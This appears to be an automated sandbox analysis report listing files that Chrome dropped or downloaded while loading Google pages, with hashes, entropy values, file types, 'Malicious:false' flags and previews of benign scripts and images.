                                                                                                                                                                                                                                                                                          SHA-512:5E9E4739288D29500818D4ED990086FCC51E47AA90F93FFC4C27DCD4907A0713B0C43612903B924CD2C3D3F37CBD3E8908127F352A6616FBCCE0143D887D6B44
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 36838
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):14350
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.984483602188714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:cO0O0wJ/PxWHXndpPTCj9kDQeOH5jY3ZZjRilCWPjlHtiW9YkweQbacy5avRNwR8:o7wJ/ZWHfO5gQappRmlsoYkwDByNHKem
                                                                                                                                                                                                                                                                                          MD5:860B6F62D691F6A3D6C67630D3375FAC
                                                                                                                                                                                                                                                                                          SHA1:999700FC083BB29042354FE7F2542CEEEA307569
                                                                                                                                                                                                                                                                                          SHA-256:A791D3E0B96EDA5E14479012D0153B8C75C62E75963F37BF09EC99B6F6B2DD8C
                                                                                                                                                                                                                                                                                          SHA-512:6C76856A3939ED281B53022C00A2FEAC86CB12E85C6BFACEB1018B311420C5E61BD48AB8825C4B744282A095043B709BC681FFB836C1A1C2C90495C8F8FF19DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........}.v.F...y.......E.c@A\.,.J<(....~..,Q.I..@.....s...o.o....I._...k@...._+...j...*.GY.U.}...x..".Yx:K.E.&.w..r..,..N....%Cq.'b.4..j*...h..D..8....7/.d.^..?.o..T;.o.b|.?......(\...u&.Y.4.[...r.fE...~.V...f....e....~..gaH..m.ga.:..G....g..RN...yWNzeE.[..Mke...?....<.[...X{.s=?.L...4.......f...V&.....u..&.7.7<....,....r.....=.EPSi>.........=U....d6.Yt2.~..F.o....3...xZ..?..O.he.....x.^.......1..".\../...w.Y..`.Mw. ..ckYJ2......:.....i<..@Q.Ae.Y\.....}?..3..X...H..!..?.:1.8.3.^;....>.W....:N;......u....:...v...e...\.G..DJ[.;U.....T.....ye.....0.^q....Cp.n.....D.7E...1..Y:l.I.i..o.I....%..s.....<]b)..41....]2...[..^b..)u...,..?....a..7...6.d6u..z.LC..-.....Q.h..4.|... M....)..E.f.$..s..q9X....Y.[.._-..Z......>.Y{....I._.S..F...A&.B..=.....b..H.q..p.?..._.....AN{..9_.-.H.!.0.w..W$F..A).XG.,D8D.~....ov0.......%.......i....Y.p..C....$....i..dQ...4..E#J.:Z..C..IV...'..S...p.......vh.x.:C....Frs........D....t>......v$.R;++.-.8..HX..0.d..Ck
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (929)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1189
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.269841803151626
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:xlJaZDqE0TsXeHVQEurgpmlvr9sTL4KHSsRon0T:kO4O1UgOSTSsRk0T
                                                                                                                                                                                                                                                                                          MD5:63D8EF54E525B3D0F3F85C23080C3870
                                                                                                                                                                                                                                                                                          SHA1:BC656AF2A67F2DC2C4FCBF596FD6FA8C46092F69
                                                                                                                                                                                                                                                                                          SHA-256:2A0CF445FD832AC8E06C91D93F2F5A7F178A5A9F82D0B0BB427EA838D7016D46
                                                                                                                                                                                                                                                                                          SHA-512:70C26832BF17AF22107AC8440742BBAC6F9EB514D2F30FA0AB05FAD320CBE9ABAF492C3E0C47849D07BC96F060BE3193678AA918067F5BD397454563285D74F0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as a,s as p,x as b}from"./ycaG4YXp.min.js";import{e as c}from"./0XPwTFcg.min.js";import{n as v}from"./IYoTYjYE.min.js";import{e as d}from"./p9kcPq91.min.js";const f=".button{padding:0;cursor:pointer;background:none;border:none;font-family:inherit;display:flex;align-items:center;width:100%;gap:12px;color:currentColor}";var m=Object.defineProperty,g=Object.getOwnPropertyDescriptor,u=(r,t,s,n)=>{for(var e=n>1?void 0:n?g(t,s):t,i=r.length-1,l;i>=0;i--)(l=r[i])&&(e=(n?l(t,s,e):l(e))||e);return n&&e&&m(t,s,e),e};let o=class extends p{toggle(){const r=document.querySelector("[top-level-nav]"),t=document.querySelector(`#${this.target}`);t&&(t.hasAttribute("open")?t.removeAttribute("open"):t.setAttribute("open",""),t.ariaHidden=t.hasAttribute("open")?"false":"true",r.ariaHidden=t.hasAttribute("open")?"true":"false",t.hasAttribute("open")?r.setAttribute("hidden","true"):r.removeAttribute("hidden"))}render(){return b`. <button class="button" @click=${()=>this.toggle()}>. <slo
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3170
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.934630496764965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:c2ZEPhMXQnPkVrTEnGD9c4vnrmBYBaSfS18:c2/XQnPGroGD9vvnXVaq
                                                                                                                                                                                                                                                                                          MD5:9D73B3AA30BCE9D8F166DE5178AE4338
                                                                                                                                                                                                                                                                                          SHA1:D0CBC46850D8ED54625A3B2B01A2C31F37977E75
                                                                                                                                                                                                                                                                                          SHA-256:DBEF5E5530003B7233E944856C23D1437902A2D3568CDFD2BEAF2166E9CA9139
                                                                                                                                                                                                                                                                                          SHA-512:8E55D1677CDBFE9DB6700840041C815329A57DF69E303ADC1F994757C64100FE4A3A17E86EF4613F4243E29014517234DEBFBCEE58DAB9FC56C81DD147FDC058
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(..*.N_R."0`.-.A..|.*N..`....n..{.&..l.o..;.....a....d..$.................J.1.*.....7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4|.F...9......pP.8.|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}*......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):322864
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7253988995392264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:yp8owIBMCofb1byXaFQLC8OEzCxpapWt4:TI9iBb7EOEqEct4
                                                                                                                                                                                                                                                                                          MD5:61F4CE1795C76A236FA455EFBB5980F8
                                                                                                                                                                                                                                                                                          SHA1:06FB72DCB6136A460335059C883A4C973A9BEC8A
                                                                                                                                                                                                                                                                                          SHA-256:91D63A003F5DDD872C2A2AFF6CF4BEE11053DB924EA94D501012BA4C2473DF5D
                                                                                                                                                                                                                                                                                          SHA-512:299DC3098C56155C275674978F77A788EE1AE6E20301794A1493C54B9A460E0807879EBC34BE8796E1B95D10A9446AFB8BFF8BD033ABA0DBD0885719378A5B7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/hgUtJ1raSgkAHurP6yDzukLnNF1V7vS4MTeqzThHkHTz1sc8nYizzkb6TPElQ0_LzIZEmwIEYgv7J1PZO-KUvQjONRqHNTc3p72BnEQ=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF(...WEBPVP8L..../..D..u!...B.m..........f..,.D.K.V.0^:P.....m.....fp...."..EY.I[.i2..:6.tm..@mcj7-..c..{...F.J....ZfS...4....h.r.&."...c9.CY.-..(..Er....\........E.........D.?.../k....GJ.J.H.*.P...Zq....0..2.J.:B..AZ.t&..uz.8-.N.I..I..mk.....}...[.m{.i..y...W.b.bW...ff.%fZ.^d.......T8...8.bF..K....u...l.......T .6...S.@..Nt.'i.8.W.J.....pV.......Fp....`[..e.&M....,..?""...?.M$..<.R.d.l.E.....y.1..M..v...!v<..U;S....3...}.3.Xw.R.....f7.Q..D...`%..^..}Y...q....iY.Le..D.y2SJ.I...zm.Vm[r..s.s.}...df.K...........,yQ...CZl1..3.w..s...m..^..1.>..._.fJ.rf.........c......2f&I....w.=..........'.N.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):170607
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.400378968347762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:yMyT/I+HNCTBHhq1hyw0WaLedLpnf26boIfyxCWiZ:yrqBBxLWa69DyxMZ
                                                                                                                                                                                                                                                                                          MD5:51C7EFB4D10E059CADEA0BE0322B420F
                                                                                                                                                                                                                                                                                          SHA1:A4BA6E03BA48A119539E6BE2E05302AC2F1A3C42
                                                                                                                                                                                                                                                                                          SHA-256:B24F4E645DB81EA79BB26791E2C282C5E31AB68900ECAB482B88473BAD2A9B9E
                                                                                                                                                                                                                                                                                          SHA-512:8C61015535FFA73AFE33195E30F66B5798A6AF417EC0C7DBCE145F916911460F24FCC7D5B0F15AE5F97719859807A38E22E9A34DB151900E09762349106ADFD1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/angularjs/1.6.10/angular.min.js
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(y){'use strict';function qe(a){if(G(a))u(a.objectMaxDepth)&&(Oc.objectMaxDepth=Wb(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return Oc}function Wb(a){return Y(a)&&0<a}function M(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d+"] http://errors.angularjs.org/1.6.10/"+(a?a+"/":"")+d;for(d=1;d<arguments.length;d++){c=c+(1==d?"?":"&")+"p"+(d-1)+"=";var e=encodeURIComponent,f;f=arguments[d];f="function"==typeof f?f.toString().replace(/ \{[\s\S]*$/,""):"undefined"==.typeof f?"undefined":"string"!=typeof f?JSON.stringify(f):f;c+=e(f)}return new b(c)}}function ja(a){if(null==a||Za(a))return!1;if(I(a)||F(a)||z&&a instanceof z)return!0;var b="length"in Object(a)&&a.length;return Y(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function q(a,b,d){var c,e;if(a)if(C(a))for(c in a)"prototype"!==c&&"length"!==c&&"name"!==c&&a.hasOwnProperty(c)&&b.call(d
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):660
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.7436458678149815
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
                                                                                                                                                                                                                                                                                          MD5:C3DFF0D9F30EC0BCF4DEC9524505916B
                                                                                                                                                                                                                                                                                          SHA1:4B378403ACBEBC3747E08C69B5FD7770A850C9EB
                                                                                                                                                                                                                                                                                          SHA-256:73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
                                                                                                                                                                                                                                                                                          SHA-512:677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.|.z..(...:&m.V.C.'...D^.R....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9452
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972633586493504
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:oluGUDoPyYMC1jr+wq+UTEbB8dZFfRg2TDN3qWpZ+8+t9:osGeo+C1uwCcARz3YW7A9
                                                                                                                                                                                                                                                                                          MD5:9471CDBEDEDB47F304694708F03522DA
                                                                                                                                                                                                                                                                                          SHA1:1A78FD5DC642031B2930B0FBBC8573A7A81AEB54
                                                                                                                                                                                                                                                                                          SHA-256:EC45B781D17011F674273C7654C2BEAECA1C097A9A38A271D57763A2CD7E2778
                                                                                                                                                                                                                                                                                          SHA-512:8E20EBEC2BC28E1BF670B21821BAA05FBD298DB86C6A8267D0BB3468A46986D11F445ED2C9BFBEEC806039EF22A557B695E2C6A2072FF35FF7FCE5B164D36C04
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x............ iCCPicc..H....XS....$$$.@(RBo.K.....6B.H(1$..;...ZP.`EWElk.dQ.........(.b...$..~...{..9s.s.N........Q5.r.y..@....&..@.!...@...( &&.@...S...P...|..._E..p.@b .q%...G...8"q...^.7..'.L.Q.M1.....3..!.4.G.m.c. ...De.......b.s2...e...\..r.d_........U. [.}.'..>.F|...#..E.J...(.=..,....l.....Q...XY..eM..1...aZT4d....\.......C..8. X3....r.....!...."....P.dX{4^..W.E...C..<IH.0...d6%...!.[.<....~|."N.-_...Y..}IV\....~P..X.+..>s...Cc.6.Y.d8/./`E.qd.?>\1...a.c...L.......Q....C.ce....!....!{....&.@n........M./.Dy1..p.L...E.....A .0...40.d.Akom/.....l .....4.#..=Bx..../H< ...(..|..2.U\.@..7_>".<..."@6.-.......C...90.l.d}?..:b.1..N.%Z.z./.G.?l...9..7{..B;......pg..P.C.L0.t..C..K.>;..zu..q..............p?8.+.~..t$.o...Ev$.dm.?....TlT\G..*.}-.q..T+h...<......#~..`G.f.4v.k.j..;..a-........1<[.<.,.G..|.9eU.8V;.8~...y..y..%h.h.X...c....d.9....Np........C..#.K.t...x.@e.7...A..@..Mg.......h.H...........7E.....+..3p......q ..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):733
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.23501156552437
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:trOPGPuCtLQVCRFAypqaFqixWkECT041T1i1AtL8gYgx2zV3lp26/:tKPGPuJVCROy9/lw4OmJ+QSV3l86/
                                                                                                                                                                                                                                                                                          MD5:46AB5AFE6A2D26878159AAE0842452F6
                                                                                                                                                                                                                                                                                          SHA1:5E55793EACC00FD735EC2BC156CBFCED792DCCA4
                                                                                                                                                                                                                                                                                          SHA-256:66A5489982598046CDCDABAFD4C5681DFC5E4AF5B1259DA934401CCAB087122D
                                                                                                                                                                                                                                                                                          SHA-512:10AD7F45E7D879DEAD37974789BA2C248A61DDB1D92202FD04858F86C1949C29BBE9C1BDEB578DFF67E77DC9CB89843AB1FE9B2DC02E86D4728699E45ED5E734
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg width="40" height="28" viewBox="0 0 40 28" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M6.66667 5.66675C6.66667 4.75008 7.41667 4.00008 8.33333 4.00008H35C35.9167 4.00008 36.6667 3.25008 36.6667 2.33341C36.6667 1.41675 35.9167 0.666748 35 0.666748H6.66667C4.83333 0.666748 3.33333 2.16675 3.33333 4.00008V22.3334H2.5C1.11667 22.3334 0 23.4501 0 24.8334C0 26.2167 1.11667 27.3334 2.5 27.3334H23.3333V22.3334H6.66667V5.66675ZM38.3333 7.33341H28.3333C27.4167 7.33341 26.6667 8.08341 26.6667 9.00008V25.6667C26.6667 26.5834 27.4167 27.3334 28.3333 27.3334H38.3333C39.25 27.3334 40 26.5834 40 25.6667V9.00008C40 8.08341 39.25 7.33341 38.3333 7.33341ZM36.6667 22.3334H30V10.6667H36.6667V22.3334Z" fill="#202124"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1200 x 971, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):351403
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.988644572783625
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:cdicOjsV4QWgBCCrmA/K50CUbsJVbC/bsDHn3Xuuqo/zrX2iL:EicOjsV4QWYrmA/KJUYb3XXeouiL
                                                                                                                                                                                                                                                                                          MD5:99A343C0018CDDC417988FBA97B206D7
                                                                                                                                                                                                                                                                                          SHA1:8A3E22B42CF8F53D7C7D22A5F757C36B633443B0
                                                                                                                                                                                                                                                                                          SHA-256:50F11C94BCCE2EBB522604DF1A7DF13A3B0F53356F5C0430A08ACA695341708D
                                                                                                                                                                                                                                                                                          SHA-512:83AF6A29FE4BD296E64234369E384EAFA5ADFF3B21C2FEB694FF90594DAB0F028C163172456920051470424C9460F1E630E860DF63254A07719EBF370C999D03
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/xilsk7-wXZ16VD4gYsv-2bNtfVkjz5JE_aGh5eS8hhUVeUb8zmNPvGgyhgXLex3TpAf-Y3sMqDpCOmZ9SlHgsrZYTORpZpiinD-AJUE=s0
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB...,.....pHYs...............\PIDATx...w.H..{......=..tw.V.U.i7....IQt......y..2....)........-.0.......M.!..B.!$....w..B.!..BH4...B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4.SC..j6.......P....?!..B.!$rh.'..x<.....Z.G.?ZDB.!..B....)....j7.m...n.{..Zv...k..Ukf_.c.0......5...z<...o.|N..B.!......N.b...!.7.9.:1~0x.r...Z_...T....%.U..y.Fc....$..B.!df.!.PB......>../._W,U ........w>_..j5.4m.v]W...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2245
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.719187207240514
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:5qGGMhnidfnfWrnhBsK1rMcZw3sE1iyxVwJ1B9TUmgGxKebh0:xG4nYnfanvsK1rMcZgsEP2LlUPGBh0
                                                                                                                                                                                                                                                                                          MD5:B2D02EFCC5146C9CBAF7AA24C28CC2BD
                                                                                                                                                                                                                                                                                          SHA1:7A75DF3D8393AEE2E1B2B0CA17D5DE7ABD9A70F2
                                                                                                                                                                                                                                                                                          SHA-256:2B4BC8BBD66F5D0985C03E48D9ED63530BD6C2D75F97F29563E28D80F592E6D9
                                                                                                                                                                                                                                                                                          SHA-512:78EFA1EF6BCCFAD2EBB4CD8F3E8A04948F48E09FC5A3AC4BA439826D38784B1960282B380328068702444CCB62E2BFC47460BDA571B171A860D7A3F3494101B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................x.x..".........................................<.........................!...1..ABQTq...."#2Ra....r...4...................................-........................!1.."AQq..2a...3r.#............?..S..." ...""...." ...""...." ..m.Af!T.Ic...I'..s$...?.]t.6...}...)........lw.....)I.....1j.....qxC.5w....1EQ.V..|6*8.S.Iq...{..mM...8...?.,....<:.....A....u.G{..O......>H.8.............+..>...`......esP.3..h`.!..AS.A..#..yD.t......Or.G........y....D.~.8....y.n..}4.e.....{....c...\..R." ...""....B..0.. .... ..9'.d.....g.....)....5..>....e+Z).A.....U...<..N\..D.........#........#...$.6.8..W...#<'.&.[..!~.R.lF#.....B...c.v.O..(....;=..G.K.t...B`......3O*..{D.$."%K..."".....4.6......D2....s..p....k7...Bm,.cr.]AR..3k. .\dn..~....E....|x^n.......X...4...9.^~H........j..a..P.j\d..Ma.`$.i.....6..p.H.......h..o..#..moH...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3334
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924697987463917
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:81VEwxg6WwVURv82kMybe9S3UWzyD6pTMBVtIW:81VEGgBwVM3kDbx3UWz2gWVOW
                                                                                                                                                                                                                                                                                          MD5:9B7BC7C53D0E1D959C865833E5B20024
                                                                                                                                                                                                                                                                                          SHA1:E433E69959B3D070EAAABC0C802CB9EA8FBCEBDC
                                                                                                                                                                                                                                                                                          SHA-256:4A481E06DECADFFDE28C8C9A6637822F7D102127AC095F978C6F6B38ED1CAD91
                                                                                                                                                                                                                                                                                          SHA-512:C0ECEE682B2C33EFA45BE3B3A5A21C928533F110C0F89A8ABE5F59E1BFF87B99E31511727A6317F452DB2EA7830D0AC92C68F77DC33ED9CF12236FF931904210
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......Em.!I.j...=..m.m.m.1.L...U....EWeF...g/#b....E}...v...?..}..1.. ...x..K[5B.m..b.....g...w.r0......l....V7?.yir..x..1...W.M.....9.dM?2..c.n.{.....3.!.5Bw]U....H..9[.<Uyn.DjF...zi./ ..6?_.C{..L2..p|.3yg....a;sC.W.o......*..z.!..8}..7.`.......D.C......J/..D.J...........@...;.k#.5D......1.8...cV....q....x]....a.6V....5.!...;..c.fm\.A........c....jQ8......G..<Dem...)&5..@.mh.G.c.q.,..h.!..n.E.E6.m..A<i.qP...e.......;..}.o..H.X...1H}`...A..G.M..#v....kt..P.(m.L......Q...Y.5..k...YS..|u..8.......q.?...u.=.O.......T....F...U.,.E...liG.5.e...+.F.......k+.S.m.F.o...pF.).{R4....F.p._.s.z9...4S..p.1A9..:..D=Z...J...X#..wDz...u.. ...~u.....A....HR.J'lp..yF....5..Z\...T.....v....E.h.".ti.";<R... ``Q...s6"X.5.....E..0.kx`$.......|0.m.A.......a..kd.#.s..?.N[.8[m...9..'....0...1...p.....B.3e..&....T....B~".>&8m....c....@....n.J$....A..%...s..iDl.wW...[....p....(8.A.:Q4!.^....w.......,.-sS.3...Y..C1........jY..0
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:P:P
                                                                                                                                                                                                                                                                                          MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                                                                                                                                                          SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                                                                                                                                                          SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                                                                                                                                                          SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15996
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989012096227512
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:nH4UArsQ/nHYjtuHgovTC+H+b23+kMw/KjK0TQ59u98pgQXk:nYZQjtuHgYGbrMyjDiJXk
                                                                                                                                                                                                                                                                                          MD5:CC536892EABDE0EAEB81493BDA8E189A
